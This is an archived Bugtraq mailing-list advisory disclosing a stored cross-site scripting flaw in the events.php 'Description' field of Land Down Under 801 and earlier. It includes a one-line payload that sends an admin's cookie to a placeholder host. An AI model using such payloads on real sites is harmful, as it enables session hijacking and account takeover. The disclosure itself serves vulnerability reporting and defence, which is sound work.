Home page logo
/

bugtraq logo Bugtraq mailing list archives

Land Down Under 'events.php' Cross Site Scripting Vulnerability
From: conor.e.buckley () gmail com
Date: 5 Sep 2005 20:11:45 -0000

In Land Down Under (LDU http://www.neocrome.net/), the target script "events.php?m=add" is vulnerable to XSS.

When submitting an event, the "Description" field is vulnerable to HTML injection.  Any user logged in can submit an 
event but an admin must approve of the event before being publicly viewed.  Using javascript, an admin's cookie can be 
stolen.

Exploit:
Description:
<script>document.location="http://example.com/script?cookie="+escape(document.cookie)</script>


LDU 801 and earlier are vulnerable.

--------------------------------
conor.e.buckley () gmail com
http://quixote.at.preempted.net


  By Date           By Thread  

Current thread:
  • Land Down Under 'events.php' Cross Site Scripting Vulnerability conor . e . buckley (Sep 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]